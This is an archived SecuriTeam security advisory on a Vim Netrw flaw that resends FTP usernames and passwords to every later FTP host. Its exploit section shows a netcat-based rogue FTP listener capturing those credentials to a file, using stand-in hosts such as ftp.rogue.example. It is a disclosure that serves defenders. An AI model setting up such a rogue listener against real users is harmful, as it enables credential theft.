[UNIX] Vim Netrw FTP User Name and Password Disclosure



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Vim Netrw FTP User Name and Password Disclosure
------------------------------------------------------------------------


SUMMARY

"Netrw supports "transparent" editing of files on other machines using
[...] vim ftp://hostname/path/to/file"; The Vim Netrw Plugin shares the FTP
user name and password across all FTP sessions. Every time Vim makes a
new FTP connection, it sends the user name and password of the previous
FTP session to the FTP server.

DETAILS

Vulnerable Systems:
* Vim version 7.1.266
* Vim version 7.2
* autoload/netrw.vim version 131
* autoload/netrw.vim version 109

Once vim successfully connects to an FTP server using a user name and
password credentials, it will re-use them in all subsequent FTP sessions,
regardless of the domain name or TCP port.

This behaviour is documented, although the documentation states the
credentials are ``retained on a per-session basis''. Apparently the Vim
session, not the FTP session:
``g:netrw_uid (ftp) user-id, retained on a per-session basis
s:netrw_passwd (ftp) password, retained on a per-session basis''

-- Netrw Reference Manual (``pi_netrw.txt'')

Although FTP communication is not encrypted and therefore open to
eavesdropping, if the access to the network is protected, a
credentials-based access control is meaningful, and the credentials must
be kept secret. For example, an FTP connection to a virtual Xen instance
on the same physical machine is secure; so is an FTP session over a local
ethernet segment secured against access from untrusted parties.

Exploit:
No adversary action on the part of the attacker is necessary, apart from
keeping logs of the user name, password, source IP address, and other
information about the FTP session.

An example using netcat(1) for the rouge FTP server. There is another FTP
server already running on the machine:
# For the sake of this example, a custom hosts file. Note that
# ftp.secure.example and ftp.rogue.example map to different IP
# addresses.
$ grep '\.example' /etc/hosts
127.0.1.1 ftp.secure.example
127.0.1.2 ftp.rogue.example
# There is a stock FTP server running already
$ netstat -plan | grep ftp
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd
# Start the rogue FTP server
$ printf '220\r\n331\r\n' \
| netcat -lp 31337 ftp.rogue.example > credentials&
# We use the ex command for clarity.
$ ex ftp://ftp.secure.example/
Enter username: rdancer
Enter Password: *************
Entering Ex mode. Type "visual" to go to Normal mode.
:spl ftp://ftp.rogue.example:31337/
"ftp://ftp.rogue.example:31337/"; --No lines in buffer--
:qa!
$ cat credentials
USER rdancer
PASS z5vS24u76OrGM


ADDITIONAL INFORMATION

The information has been provided by <mailto:rdancer@xxxxxxxxxxx> Jan
Minar.
The original article can be found at:
<http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html>
http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] Microsoft wininet.dll FTP Reply Null Termination Heap Corruption Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft 'wininet.dll' FTP Reply Null Termination Heap Corruption ... Windows Server 2003 Enterprise Edition SP1 ... This vulnerability appears to have existed from at least Internet ...
    (Securiteam)
  • [EXPL] CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... FTP program that makes it easy to drag and drop files to and from your ... CoffeeCup FTP to execute arbitrary code. ... direct | free "direct" to exploit a CoffeeCup Direct FTP client ...
    (Securiteam)
  • [UNIX] FTP Kioslave Command Injection
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... KDE applications which use the FTP kioslave, e.g. Konqueror, allow remote ... The FTP kioslave can be misused to execute any ftp command on the server ...
    (Securiteam)
  • [NT] ArGoSoft FTP Server XCMD Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ArGoSoft FTP Server is ...
    (Securiteam)
  • [NEWS] Multiple Vulnerabilities in the QNX Platform
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... QNX 6.1 FTP client is vulnerable to a format string in 'quote' command. ... Memory fault ... there is a theoretical race condition vulnerability. ...
    (Securiteam)